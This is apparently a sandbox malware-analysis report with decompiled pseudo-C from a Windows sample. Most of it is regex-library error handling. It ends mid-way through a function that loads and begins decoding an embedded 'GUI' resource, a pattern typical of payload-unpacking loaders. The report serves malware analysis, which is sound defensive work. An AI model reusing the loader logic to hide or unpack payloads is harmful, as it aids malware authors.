                                                    • Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd
                                                    Similarity
                                                    • API ID: H_prolog$ExceptionThrowstrlen
                                                    • String ID: quantifier not expected
                                                    • API String ID: 2054561153-3090400379
                                                    • Opcode ID: ffa739ab46cdc785f705dfba8158c4e06e3bd99cb083d143c2a2a728a6b6dcb6
                                                    • Instruction ID: 96f9309febd4b26ccc1dd5471e80c689c957bcaa372d40d9e1b63adb595ee9a0
                                                    • Opcode Fuzzy Hash: ffa739ab46cdc785f705dfba8158c4e06e3bd99cb083d143c2a2a728a6b6dcb6
                                                    • Instruction Fuzzy Hash: 14912975700206DFCB08DF68C8D49AABBB5FF48340B14856AE916DB382DB38E955CF64
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 41%
                                                    			E0040D7A2(void* __ecx) {
                                                    				intOrPtr* _t33;
                                                    				intOrPtr _t34;
                                                    				intOrPtr* _t38;
                                                    				void* _t45;
                                                    				signed int _t46;
                                                    				signed int _t47;
                                                    				intOrPtr* _t49;
                                                    				intOrPtr _t50;
                                                    				intOrPtr _t52;
                                                    				intOrPtr _t56;
                                                    				signed int _t59;
                                                    				intOrPtr* _t64;
                                                    				intOrPtr* _t67;
                                                    				intOrPtr _t68;
                                                    				char* _t70;
                                                    				signed int _t71;
                                                    				void* _t73;
                                                    
                                                    				_t45 = __ecx;
                                                    				L004153D0();
                                                    				_t64 =  *((intOrPtr*)(_t73 + 0xc));
                                                    				_t56 =  *((intOrPtr*)(_t64 + 4));
                                                    				_t67 =  *((intOrPtr*)(_t56 + 4));
                                                    				_t33 =  *_t67;
                                                    				if(_t67 != _t33) {
                                                    					while(1) {
                                                    						_t71 =  *(_t45 + 8);
                                                    						if(_t71 <  *((intOrPtr*)(_t33 + 8))) {
                                                    							goto L3;
                                                    						}
                                                    						 *(_t45 + 8) = _t71 + 1;
                                                    						_t33 =  *_t33;
                                                    						if( *((intOrPtr*)(_t56 + 4)) != _t33) {
                                                    							continue;
                                                    						}
                                                    						goto L3;
                                                    					}
                                                    				}
                                                    				L3:
                                                    				_t34 =  *_t64;
                                                    				_t68 =  *((intOrPtr*)(_t34 + 4));
                                                    				if(_t68 != 0) {
                                                    					_t59 =  *((intOrPtr*)(_t34 + 8)) - _t68 >> 2;
                                                    				} else {
                                                    					_t59 = 0;
                                                    				}
                                                    				_t46 =  *(_t45 + 8);
                                                    				if(_t46 >= _t59) {
                                                    					 *((char*)(_t73 - 0x24)) =  *((intOrPtr*)(_t73 + 0xb));
                                                    					 *0x417230(0);
                                                    					_t70 = "reference to nonexistent group";
                                                    					 *0x417234(_t70, strlen(_t70));
                                                    					 *(_t73 - 4) =  *(_t73 - 4) & 0x00000000;
                                                    					_t46 = _t73 - 0x40;
                                                    					 *0x417218(_t73 - 0x24);
                                                    					_t34 = _t73 - 0x40;
                                                    					_push(0x4196f8);
                                                    					_push(_t34);
                                                    					 *(_t73 - 0x40) = 0x417698;
                                                    					L004153FE();
                                                    				}
                                                    				_t47 = _t46 << 2;
                                                    				if( *((intOrPtr*)(_t47 +  *((intOrPtr*)(_t34 + 4)))) != 0) {
                                                    					_t49 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t47 +  *((intOrPtr*)(_t34 + 4)))))) + 0x2c))(_t73 - 0x14, _t64);
                                                    					_t38 =  *((intOrPtr*)(_t73 + 8));
                                                    					 *_t38 =  *_t49;
                                                    					_t50 =  *((intOrPtr*)(_t49 + 4));
                                                    				} else {
                                                    					_t38 =  *((intOrPtr*)(_t73 + 8));
                                                    					_t52 =  *0x417690; // 0x0
                                                    					 *_t38 = _t52;
                                                    					_t50 =  *0x417694; // 0xffffffff
                                                    				}
                                                    				 *((intOrPtr*)(_t38 + 4)) = _t50;
                                                    				 *[fs:0x0] =  *((intOrPtr*)(_t73 - 0xc));
                                                    				return _t38;
                                                    			}

                                                    0x0040d880
                                                    0x0040d888

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd
                                                    Similarity
                                                    • API ID: ExceptionH_prologThrowstrlen
                                                    • String ID: reference to nonexistent group
                                                    • API String ID: 1214428233-2717939947
                                                    • Opcode ID: 7efb9d85ebac9796ab21eb8f6055979a84d87173f89abdbeec425e1fb8ad2327
                                                    • Instruction ID: 522e6e50840da4ac399b5e0b3b8a6ae22c3212176d366e94a0c7a72128cb66c6
                                                    • Opcode Fuzzy Hash: 7efb9d85ebac9796ab21eb8f6055979a84d87173f89abdbeec425e1fb8ad2327
                                                    • Instruction Fuzzy Hash: 4E31D135A00114CFC710DF48C544ADABBF5FF89300B24C0AAE81AAB361C774ED46CB98
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 34%
                                                    			E0040DB46(intOrPtr __ecx, void* __eflags) {
                                                    				char* _t25;
                                                    				intOrPtr* _t26;
                                                    				intOrPtr _t33;
                                                    				char* _t34;
                                                    				intOrPtr _t39;
                                                    				char* _t44;
                                                    				char* _t46;
                                                    				void* _t48;
                                                    				intOrPtr _t51;
                                                    				void* _t53;
                                                    
                                                    				L004153D0();
                                                    				_push(__ecx);
                                                    				_t33 =  *((intOrPtr*)(_t53 + 0xc));
                                                    				_t46 =  *((intOrPtr*)(_t53 + 8));
                                                    				_t51 = __ecx;
                                                    				 *((intOrPtr*)(_t53 - 0x10)) = __ecx;
                                                    				 *(__ecx + 4) =  *(__ecx + 4) & 0x00000000;
                                                    				 *((intOrPtr*)(__ecx + 8)) = _t46;
                                                    				 *((intOrPtr*)(__ecx + 0xc)) = _t33;
                                                    				 *((intOrPtr*)(__ecx + 0x10)) = _t33 - _t46;
                                                    				 *((intOrPtr*)(__ecx)) = 0x418524;
                                                    				 *(_t53 - 4) =  *(_t53 - 4) & 0x00000000;
                                                    				 *((intOrPtr*)(_t53 + 8)) =  *((intOrPtr*)( *((intOrPtr*)(_t53 + 0x10))));
                                                    				 *(_t53 - 4) = 1;
                                                    				_t25 = E0040507F( *((intOrPtr*)( *((intOrPtr*)(_t53 + 0x10)))), _t33 - _t46);
                                                    				_t39 =  *((intOrPtr*)(__ecx + 0xc));
                                                    				 *((intOrPtr*)(__ecx + 0x14)) = _t25;
                                                    				_t44 = _t25;
                                                    				_t26 =  *((intOrPtr*)(__ecx + 8));
                                                    				 *((intOrPtr*)(__ecx)) = 0x4184f0;
                                                    				 *((intOrPtr*)(_t53 + 8)) = _t39;
                                                    				if(_t26 != _t39) {
                                                    					do {
                                                    						 *_t44 =  *_t26;
                                                    						_t44 = _t44 + 1;
                                                    						_t26 = _t26 + 1;
                                                    					} while (_t26 !=  *((intOrPtr*)(_t53 + 8)));
                                                    				}
                                                    				if(_t33 != _t46) {
                                                    					do {
                                                    						 *_t46 =  *0x4172a4( *_t46);
                                                    						_t46 = _t46 + 1;
                                                    					} while (_t46 != _t33);
                                                    				}
                                                    				_t34 =  *((intOrPtr*)(_t51 + 0x14));
                                                    				_t48 =  *((intOrPtr*)(_t51 + 0x10)) + _t34;
                                                    				if(_t48 != _t34) {
                                                    					do {
                                                    						 *_t34 =  *0x4172ac( *_t34);
                                                    						_t34 = _t34 + 1;
                                                    					} while (_t34 != _t48);
                                                    				}
                                                    				 *[fs:0x0] =  *((intOrPtr*)(_t53 - 0xc));
                                                    				return _t51;
                                                    			}

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd
                                                    Similarity
                                                    • API ID: H_prologtolowertoupper
                                                    • String ID: q@
                                                    • API String ID: 3817453147-2764676539
                                                    • Opcode ID: 73ff7f4954beee42502f4c3e86e4eba7fd1ee4c9d3429739a6c375338378a641
                                                    • Instruction ID: 1cd1e5bdde56281f47441b0658e7e07e847f1fa8a3c8823e6e5bb0bf60c20c5d
                                                    • Opcode Fuzzy Hash: 73ff7f4954beee42502f4c3e86e4eba7fd1ee4c9d3429739a6c375338378a641
                                                    • Instruction Fuzzy Hash: 4321C271A007418FCB20CF59C48065AFBF5EF48311B14856FE496D7741C778A844CB54
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd
                                                    Similarity
                                                    • API ID: ExceptionH_prologThrowstrlen
                                                    • String ID: sub-expression cannot be quantified
                                                    • API String ID: 1214428233-703565053
                                                    • Opcode ID: 5f16f241e1e2788338eb854fdbc6d0081568565bca7829bb6e3aeedb11ea1316
                                                    • Instruction ID: 2ce7878e2e45b983fac23937024426c5bb2166d395f322666b5fa2fe93735dc8
                                                    • Opcode Fuzzy Hash: 5f16f241e1e2788338eb854fdbc6d0081568565bca7829bb6e3aeedb11ea1316
                                                    • Instruction Fuzzy Hash: 2A11C231845114AFCB10DF94DC44EEEBB78FF48350F10849EF862A7260DBB85945CB6A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 17%
                                                    			E00409027(void* __esi) {
                                                    				signed int _v4;
                                                    				char _v13;
                                                    				char _v32;
                                                    				char _v60;
                                                    				intOrPtr _v64;
                                                    				intOrPtr _v68;
                                                    				char* _t28;
                                                    
                                                    				L004153D0();
                                                    				_v32 = _v13;
                                                    				 *0x417230(0, __esi);
                                                    				_t28 = "recursion sub-expression cannot be quantified";
                                                    				 *0x417234(_t28, strlen(_t28));
                                                    				_v4 = _v4 & 0x00000000;
                                                    				 *0x417218( &_v32);
                                                    				_push(0x4196f8);
                                                    				_push( &_v60);
                                                    				_v60 = 0x417698;
                                                    				L004153FE();
                                                    				_push(_v64);
                                                    				return E0040A9C0( &_v60, _v68, _v64);
                                                    			}

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd
                                                    Similarity
                                                    • API ID: ExceptionH_prologThrowstrlen
                                                    • String ID: recursion sub-expression cannot be quantified
                                                    • API String ID: 1214428233-1191606697
                                                    • Opcode ID: fbb796b0e515c8facd89e1b44fde87da6dc0ac1903ddd3c03e83496d647a9f37
                                                    • Instruction ID: 10e607d7a6f2a3e9ba9a672d8d2b0ae7a902c0b6b7616f674ba24b2d4bce1438
                                                    • Opcode Fuzzy Hash: fbb796b0e515c8facd89e1b44fde87da6dc0ac1903ddd3c03e83496d647a9f37
                                                    • Instruction Fuzzy Hash: 9FF0813684111CFBCF00AB95EC45ADD7B38FF08350F008056F815A6061DBB84644CBB9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 21%
                                                    			E004133FE() {
                                                    				intOrPtr _t15;
                                                    				void* _t27;
                                                    				char* _t28;
                                                    				void* _t30;
                                                    
                                                    				L004153D0();
                                                    				_t15 =  *((intOrPtr*)(_t30 + 0xc));
                                                    				if(_t15 ==  *((intOrPtr*)(_t30 + 8))) {
                                                    					 *((char*)(_t30 - 0x1c)) =  *((intOrPtr*)(_t30 + 0xf));
                                                    					 *0x417230(0, _t27);
                                                    					_t28 = "expecting end of character set";
                                                    					 *0x417234(_t28, strlen(_t28));
                                                    					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
                                                    					 *0x417218(_t30 - 0x1c);
                                                    					_t15 = _t30 - 0x38;
                                                    					_push(0x4196f8);
                                                    					_push(_t15);
                                                    					 *((intOrPtr*)(_t30 - 0x38)) = 0x417698;
                                                    					L004153FE();
                                                    				}
                                                    				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
                                                    				return _t15;
                                                    			}

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd
                                                    Similarity
                                                    • API ID: ExceptionH_prologThrowstrlen
                                                    • String ID: expecting end of character set
                                                    • API String ID: 1214428233-2681132798
                                                    • Opcode ID: 7219f07c24a79d8181a22715a1ffc87983ad203cd271f7cc1843931ab176e907
                                                    • Instruction ID: fb0b6af9fdd803d394df8d1c0f25a948e4417c071c105f155f0c22cdd341b05e
                                                    • Opcode Fuzzy Hash: 7219f07c24a79d8181a22715a1ffc87983ad203cd271f7cc1843931ab176e907
                                                    • Instruction Fuzzy Hash: 49014471C41109EFCB01EF94E885BED7B78EF04755F108056F822D7151DBB85685CBA9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 16%
                                                    			E004073CC() {
                                                    				void* _t24;
                                                    				char* _t25;
                                                    				void* _t27;
                                                    
                                                    				L004153D0();
                                                    				 *((char*)(_t27 - 0x20)) =  *((intOrPtr*)(_t27 - 0xd));
                                                    				 *0x417230(0, _t24);
                                                    				_t25 = "look-ahead assertion cannot be quantified";
                                                    				 *0x417234(_t25, strlen(_t25));
                                                    				 *(_t27 - 4) =  *(_t27 - 4) & 0x00000000;
                                                    				 *0x417218(_t27 - 0x20);
                                                    				_push(0x4196f8);
                                                    				_push(_t27 - 0x3c);
                                                    				 *((intOrPtr*)(_t27 - 0x3c)) = 0x417698;
                                                    				L004153FE();
                                                    				return 1;
                                                    			}

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd
                                                    Similarity
                                                    • API ID: ExceptionH_prologThrowstrlen
                                                    • String ID: look-ahead assertion cannot be quantified
                                                    • API String ID: 1214428233-1240756859
                                                    • Opcode ID: 9e2f4fd4c15755663806f266f11c971fff55ce048fff76855c59b62dfc479332
                                                    • Instruction ID: 1721b6b3a732f0907001ba31f53c3af67a5e291595c0cbf9be71024513a692cd
                                                    • Opcode Fuzzy Hash: 9e2f4fd4c15755663806f266f11c971fff55ce048fff76855c59b62dfc479332
                                                    • Instruction Fuzzy Hash: E2F03035851118ABCB04AB94EC55ADD7B78BF59351F404096F821A2161DFB80549CBBA
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd
                                                    Similarity
                                                    • API ID: ExceptionH_prologThrowstrlen
                                                    • String ID: invalid vector<T> subscript
                                                    • API String ID: 1214428233-3016609489
                                                    • Opcode ID: 32645d7027a1448dc9c7cd0a2fdd559ffa8faeac615e55df810cf06cfd7f0d5b
                                                    • Instruction ID: 7f0d4b690d67eaef1822860b9d25e2d5405d004bbf420f7a3b0005bfa06bd269
                                                    • Opcode Fuzzy Hash: 32645d7027a1448dc9c7cd0a2fdd559ffa8faeac615e55df810cf06cfd7f0d5b
                                                    • Instruction Fuzzy Hash: E5F03076C45118ABDB04EBE4EC49AED7B78FF18350F0040A6F811A3161DFB85545CBB9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd
                                                    Similarity
                                                    • API ID: tolowertoupper
                                                    • String ID:
                                                    • API String ID: 1080271956-0
                                                    • Opcode ID: e599ae38eb4c4bdec4b3ad466f712a7868cafc2f9f9f89be0026709ef1153904
                                                    • Instruction ID: 36f9c2d77fe6c67efd501578e7725a05c9af3bd086344374b91f15e4db579863
                                                    • Opcode Fuzzy Hash: e599ae38eb4c4bdec4b3ad466f712a7868cafc2f9f9f89be0026709ef1153904
                                                    • Instruction Fuzzy Hash: 07A14D71A04205DFCB14CF64C9846AEBFB8BF08316F1481AAE855A7391C778EA45CF99
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 71%
                                                    			E0041346F(intOrPtr* _a4, intOrPtr _a8, char _a12) {
                                                    				void* __ebp;
                                                    				intOrPtr* _t11;
                                                    				intOrPtr* _t24;
                                                    				intOrPtr _t25;
                                                    				intOrPtr _t27;
                                                    				intOrPtr* _t29;
                                                    				signed char _t33;
                                                    				signed char _t37;
                                                    				signed char _t40;
                                                    				void* _t41;
                                                    				void* _t42;
                                                    				void* _t44;
                                                    				void* _t46;
                                                    				intOrPtr _t50;
                                                    				intOrPtr _t56;
                                                    				intOrPtr* _t57;
                                                    				void* _t58;
                                                    				void* _t59;
                                                    
                                                    				_t57 = _a4;
                                                    				_t56 = _a8;
                                                    				_push(_t56);
                                                    				_push( *_t57);
                                                    				E004133FE();
                                                    				_t11 =  *_t57;
                                                    				_t33 =  *_t11;
                                                    				_t40 = _t33;
                                                    				_t59 = _t40 - 0x66;
                                                    				if(_t59 > 0) {
                                                    					_t41 = _t40 - 0x6e;
                                                    					if(_t41 == 0) {
                                                    						if(_a12 != 0) {
                                                    							_t33 = 0xa;
                                                    						}
                                                    						L39:
                                                    						 *_t57 = _t11 + 1;
                                                    						L40:
                                                    						return _t33;
                                                    					}
                                                    					_t42 = _t41 - 4;
                                                    					if(_t42 == 0) {
                                                    						if(_a12 != 0) {
                                                    							_t33 = 0xd;
                                                    						}
                                                    						goto L39;
                                                    					}
                                                    					_t44 = _t42;
                                                    					if(_t44 == 0) {
                                                    						if(_a12 != 0) {
                                                    							_t33 = 9;
                                                    						}
                                                    						goto L39;
                                                    					}
                                                    					_t46 = _t44;
                                                    					if(_t46 == 0) {
                                                    						if(_a12 != 0) {
                                                    							_t33 = 0xb;
                                                    						}
                                                    						goto L39;
                                                    					}
                                                    					if(_t46 != 0) {
                                                    						goto L39;
                                                    					}
                                                    					_t33 = 0;
                                                    					 *_t57 = _t11 + 1;
                                                    					while(E00402F9A( *((intOrPtr*)( *_t57))) != 0) {
                                                    						_t33 = (_t33 << 4) + E00402FBD( *((intOrPtr*)( *_t57)));
                                                    						 *_t57 =  *_t57 + 1;
                                                    						_push(_t56);
                                                    						_push( *_t57);
                                                    						E004133FE();
                                                    						_t58 = _t58 + 0xc;
                                                    					}
                                                    					goto L40;
                                                    				}
                                                    				if(_t59 == 0) {
                                                    					if(_a12 != 0) {
                                                    						_t33 = 0xc;
                                                    					}
                                                    					goto L39;
                                                    				}
                                                    				if(_t40 < 0x30) {
                                                    					goto L39;
                                                    				}
                                                    				if(_t40 <= 0x37) {
                                                    					_t33 = _t33 - 0x30;
                                                    					 *_t57 = _t11 + 1;
                                                    					while(1) {
                                                    						_t24 =  *_t57;
                                                    						_t50 =  *_t24;
                                                    						if(_t50 < 0x30 || _t50 > 0x37) {
                                                    							goto L40;
                                                    						}
                                                    						_push(_t56);
                                                    						_t33 = (_t33 - 6 << 3) + _t50;
                                                    						_t25 = _t24 + 1;
                                                    						_push(_t25);
                                                    						 *_t57 = _t25;
                                                    						E004133FE();
                                                    					}
                                                    					goto L40;
                                                    				}
                                                    				if(_t40 == 0x5c) {
                                                    					if(_a12 != 0) {
                                                    						_t33 = 0x5c;
                                                    					}
                                                    					goto L39;
                                                    				}
                                                    				if(_t40 == 0x61) {
                                                    					if(_a12 != 0) {
                                                    						_t33 = 7;
                                                    					}
                                                    					goto L39;
                                                    				}
                                                    				if(_t40 == 0x63) {
                                                    					_t27 = _t11 + 1;
                                                    					_push(_t56);
                                                    					_push(_t27);
                                                    					 *_t57 = _t27;
                                                    					E004133FE();
                                                    					_t29 =  *_t57;
                                                    					_t37 =  *_t29;
                                                    					 *_t57 = _t29 + 1;
                                                    					if(_t37 >= 0x61 && _t37 <= 0x7a) {
                                                    						_t37 =  *0x4172a4(_t37);
                                                    					}
                                                    					_t33 = _t37 ^ 0x00000040;
                                                    					goto L40;
                                                    				} else {
                                                    					if(_t40 == 0x65) {
                                                    						_t33 = 0x1b;
                                                    					}
                                                    					goto L39;
                                                    				}
                                                    			}

                                                    APIs
                                                      • Part of subcall function 004133FE: _EH_prolog.MSVCRT ref: 00413403
                                                      • Part of subcall function 004133FE: strlen.MSVCRT ref: 0041342B
                                                      • Part of subcall function 004133FE: _CxxThrowException.MSVCRT(?,004196F8), ref: 0041345D
                                                    • toupper.MSVCRT ref: 004134E9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd
                                                    Similarity
                                                    • API ID: ExceptionH_prologThrowstrlentoupper
                                                    • String ID: a$z
                                                    • API String ID: 957254526-4151050625
                                                    • Opcode ID: 8277708e309b7c437a6dfc9d7699ad9d0b7fa53085202667cbaf6d7db5bcf054
                                                    • Instruction ID: b1aff326a2e06e5aad8b1cf850e00f7449f94b63455ed0c48128afb1fd7a013c
                                                    • Opcode Fuzzy Hash: 8277708e309b7c437a6dfc9d7699ad9d0b7fa53085202667cbaf6d7db5bcf054
                                                    • Instruction Fuzzy Hash: F341B6715451817EEB294E2884197FA3BDE9B17F0AF2C041FE4C587A92C66C4BC1C70E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 37%
                                                    			E004023AE(intOrPtr __ecx) {
                                                    				void* _t22;
                                                    				char* _t23;
                                                    				void* _t25;
                                                    				void* _t28;
                                                    
                                                    				L004153D0();
                                                    				 *((intOrPtr*)(_t28 - 0x10)) = __ecx;
                                                    				 *((char*)(__ecx + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t28 + 8))));
                                                    				 *((intOrPtr*)(__ecx + 8)) = 0;
                                                    				 *((intOrPtr*)(__ecx + 0xc)) = 0;
                                                    				 *((intOrPtr*)(__ecx + 0x10)) = 0;
                                                    				 *((intOrPtr*)(__ecx)) = 0x417664;
                                                    				_t23 = __ecx + 0x18;
                                                    				 *((intOrPtr*)(_t28 - 4)) = 0;
                                                    				 *_t23 =  *((intOrPtr*)(_t28 + 0xb));
                                                    				 *0x417230(0, _t22, _t25, __ecx);
                                                    				 *((intOrPtr*)(__ecx + 0x28)) = _t23;
                                                    				 *((intOrPtr*)(__ecx)) = 0x41766c;
                                                    				 *[fs:0x0] =  *((intOrPtr*)(_t28 - 0xc));
                                                    				return __ecx;
                                                    			}

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd
                                                    Similarity
                                                    • API ID: H_prolog
                                                    • String ID: >$@$v$@
                                                    • API String ID: 3519838083-1508283045
                                                    • Opcode ID: 197faed4f41ed2a95b5947a493da987ecdbf76c1af6f413e88e6733cf9929da4
                                                    • Instruction ID: 2a2c642b6552ba3d24064c73d9aa280cfc44eb8d4c0d781014b5c2aac6b69bdf
                                                    • Opcode Fuzzy Hash: 197faed4f41ed2a95b5947a493da987ecdbf76c1af6f413e88e6733cf9929da4
                                                    • Instruction Fuzzy Hash: 84F032B1A04B819FC720CF6D84406DAFBF4AB99710B10896FE09AD3710D3B4A580CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Execution Graph

                                                    Execution Coverage:1.7%
                                                    Dynamic/Decrypted Code Coverage:17%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:88
                                                    Total number of Limit Nodes:4

                                                    Control-flow Graph

                                                    C-Code - Quality: 76%
                                                    			E004013BC() {
                                                    				long _v8;
                                                    				signed int _v12;
                                                    				signed int _v16;
                                                    				long _v20;
                                                    				long _v24;
                                                    				void* _v39;
                                                    				void _v40;
                                                    				void* _v44;
                                                    				void* _v48;
                                                    				struct _STARTUPINFOA _v116;
                                                    				struct _PROCESS_INFORMATION _v132;
                                                    				char _v168;
                                                    				void _v427;
                                                    				char _v428;
                                                    				void _v687;
                                                    				char _v688;
                                                    				void _v947;
                                                    				char _v948;
                                                    				void _v1207;
                                                    				char _v1208;
                                                    				void _v1719;
                                                    				char _v1720;
                                                    				struct HRSRC__* _t105;
                                                    				int _t108;
                                                    				int _t124;
                                                    				void* _t136;
                                                    				signed int _t138;
                                                    				signed int _t139;
                                                    				void* _t177;
                                                    				signed int _t178;
                                                    				signed int _t193;
                                                    				signed int _t200;
                                                    				signed int _t201;
                                                    				signed int _t205;
                                                    				signed int _t209;
                                                    				signed int _t213;
                                                    				signed int _t214;
                                                    				signed int _t217;
                                                    				struct HRSRC__* _t218;
                                                    				signed int _t219;
                                                    				void* _t238;
                                                    				void* _t240;
                                                    				void* _t243;
                                                    				void* _t244;
                                                    				void* _t247;
                                                    
                                                    				_t105 = FindResourceA(0, 0x82, "GUI"); // executed
                                                    				_t218 = _t105;
                                                    				if(_t218 == 0) {
                                                    					L2:
                                                    					return 0;
                                                    				}
                                                    				_t238 = LoadResource(0, _t218);
                                                    				if(_t238 != 0) {
                                                    					_t108 = SizeofResource(0, _t218);
                                                    					_v8 = _t108;
                                                    					memcpy(_t238, LockResource(_t238), _t108);
                                                    					_v16 =  *_t238 & 0x000000ff;
                                                    					_t244 = _t243 + 0xc;
                                                    					_t219 = 0;
                                                    					_v12 =  *(_t238 + 1) & 0x000000ff;
                                                    					if(_v8 <= 0) {
                                                    						L11:
                                                    						_t193 = 0x40;
                                                    						_v428 = 0;
